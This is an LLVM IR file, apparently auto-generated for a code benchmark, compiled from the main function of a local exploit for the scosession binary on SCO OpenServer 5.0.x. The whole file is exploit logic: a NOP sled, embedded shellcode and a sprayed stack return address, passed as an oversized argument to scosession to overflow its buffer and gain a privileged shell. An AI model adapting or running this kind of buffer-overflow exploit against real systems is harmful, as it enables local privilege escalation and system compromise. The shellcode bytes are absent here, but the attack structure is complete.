; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_19499.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_19499.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@LEN = common dso_local global i32 0, align 4
@stderr = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [32 x i8] c"Error: Usage: %s offset buffer\0A\00", align 1
@.str.1 = private unnamed_addr constant [51 x i8] c"scosession local exploit for SCO OpenServer 5.0.x\0A\00", align 1
@.str.2 = private unnamed_addr constant [39 x i8] c"By Brock Tellier btellier@webley.com\0A\0A\00", align 1
@.str.3 = private unnamed_addr constant [18 x i8] c"Using addr: 0x%x\0A\00", align 1
@NOP = common dso_local global i32 0, align 4
@scoshell = common dso_local global i32 0, align 4
@.str.4 = private unnamed_addr constant [24 x i8] c"/usr/bin/X11/scosession\00", align 1
@.str.5 = private unnamed_addr constant [11 x i8] c"scosession\00", align 1
@.str.6 = private unnamed_addr constant [4 x i8] c"-bg\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i64, align 8
  %7 = alloca i32, align 4
  %8 = alloca i32, align 4
  %9 = alloca i64, align 8
  %10 = alloca i8*, align 8
  %11 = alloca i64, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i64 0, i64* %6, align 8
  %12 = load i32, i32* @LEN, align 4
  store i32 %12, i32* %8, align 4
  %13 = load i32, i32* @LEN, align 4
  %14 = zext i32 %13 to i64
  %15 = call i8* @llvm.stacksave()
  store i8* %15, i8** %10, align 8
  %16 = alloca i8, i64 %14, align 16
  store i64 %14, i64* %11, align 8
  %17 = load i32, i32* %4, align 4
  %18 = icmp sgt i32 %17, 3
  br i1 %18, label %19, label %26

19:                                               ; preds = %2
  %20 = load i32, i32* @stderr, align 4
  %21 = load i8**, i8*** %5, align 8
  %22 = getelementptr inbounds i8*, i8** %21, i64 0
  %23 = load i8*, i8** %22, align 8
  %24 = call i32 (i32, i8*, ...) @fprintf(i32 %20, i8* getelementptr inbounds ([32 x i8], [32 x i8]* @.str, i64 0, i64 0), i8* %23)
  %25 = call i32 @exit(i32 0) #4
  unreachable

26:                                               ; preds = %2
  %27 = load i32, i32* %4, align 4
  %28 = icmp eq i32 %27, 3
  br i1 %28, label %29, label %40

29:                                               ; preds = %26
  %30 = load i8**, i8*** %5, align 8
  %31 = getelementptr inbounds i8*, i8** %30, i64 1
  %32 = load i8*, i8** %31, align 8
  %33 = call i8* @atoi(i8* %32)
  %34 = ptrtoint i8* %33 to i64
  store i64 %34, i64* %6, align 8
  %35 = load i8**, i8*** %5, align 8
  %36 = getelementptr inbounds i8*, i8** %35, i64 2
  %37 = load i8*, i8** %36, align 8
  %38 = call i8* @atoi(i8* %37)
  %39 = ptrtoint i8* %38 to i32
  store i32 %39, i32* %8, align 4
  br label %41

40:                                               ; preds = %26
  store i64 9000, i64* %6, align 8
  store i32 2000, i32* %8, align 4
  br label %41

41:                                               ; preds = %40, %29
  br label %42

42:                                               ; preds = %41
  %43 = call i64 (...) @get_sp()
  store i64 %43, i64* %9, align 8
  %44 = load i32, i32* @stderr, align 4
  %45 = call i32 (i32, i8*, ...) @fprintf(i32 %44, i8* getelementptr inbounds ([51 x i8], [51 x i8]* @.str.1, i64 0, i64 0))
  %46 = load i32, i32* @stderr, align 4
  %47 = call i32 (i32, i8*, ...) @fprintf(i32 %46, i8* getelementptr inbounds ([39 x i8], [39 x i8]* @.str.2, i64 0, i64 0))
  %48 = load i32, i32* @stderr, align 4
  %49 = load i64, i64* %9, align 8
  %50 = load i64, i64* %6, align 8
  %51 = sub nsw i64 %49, %50
  %52 = call i32 (i32, i8*, ...) @fprintf(i32 %48, i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.3, i64 0, i64 0), i64 %51)
  %53 = load i32, i32* @NOP, align 4
  %54 = load i32, i32* %8, align 4
  %55 = call i32 @memset(i8* %16, i32 %53, i32 %54)
  %56 = load i32, i32* %8, align 4
  %57 = sdiv i32 %56, 2
  %58 = sext i32 %57 to i64
  %59 = getelementptr inbounds i8, i8* %16, i64 %58
  %60 = load i32, i32* @scoshell, align 4
  %61 = load i32, i32* @scoshell, align 4
  %62 = call i32 @strlen(i32 %61)
  %63 = call i32 @memcpy(i8* %59, i32 %60, i32 %62)
  %64 = load i32, i32* %8, align 4
  %65 = sdiv i32 %64, 2
  %66 = load i32, i32* @scoshell, align 4
  %67 = call i32 @strlen(i32 %66)
  %68 = add nsw i32 %65, %67
  %69 = add nsw i32 %68, 4
  store i32 %69, i32* %7, align 4
  br label %70

70:                                               ; preds = %84, %42
  %71 = load i32, i32* %7, align 4
  %72 = load i32, i32* %8, align 4
  %73 = sub nsw i32 %72, 4
  %74 = icmp slt i32 %71, %73
  br i1 %74, label %75, label %87

75:                                               ; preds = %70
  %76 = load i64, i64* %9, align 8
  %77 = load i64, i64* %6, align 8
  %78 = add nsw i64 %76, %77
  %79 = trunc i64 %78 to i32
  %80 = load i32, i32* %7, align 4
  %81 = sext i32 %80 to i64
  %82 = getelementptr inbounds i8, i8* %16, i64 %81
  %83 = bitcast i8* %82 to i32*
  store i32 %79, i32* %83, align 1
  br label %84

84:                                               ; preds = %75
  %85 = load i32, i32* %7, align 4
  %86 = add nsw i32 %85, 4
  store i32 %86, i32* %7, align 4
  br label %70

87:                                               ; preds = %70
  %88 = call i32 @execl(i8* getelementptr inbounds ([24 x i8], [24 x i8]* @.str.4, i64 0, i64 0), i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.5, i64 0, i64 0), i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.6, i64 0, i64 0), i8* %16, i32* null)
  %89 = load i8*, i8** %10, align 8
  call void @llvm.stackrestore(i8* %89)
  %90 = load i32, i32* %3, align 4
  ret i32 %90
}

; Function Attrs: nounwind
declare i8* @llvm.stacksave() #1

declare dso_local i32 @fprintf(i32, i8*, ...) #2

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #3

declare dso_local i8* @atoi(i8*) #2

declare dso_local i64 @get_sp(...) #2

declare dso_local i32 @memset(i8*, i32, i32) #2

declare dso_local i32 @memcpy(i8*, i32, i32) #2

declare dso_local i32 @strlen(i32) #2

declare dso_local i32 @execl(i8*, i8*, i8*, i8*, i32*) #2

; Function Attrs: nounwind
declare void @llvm.stackrestore(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
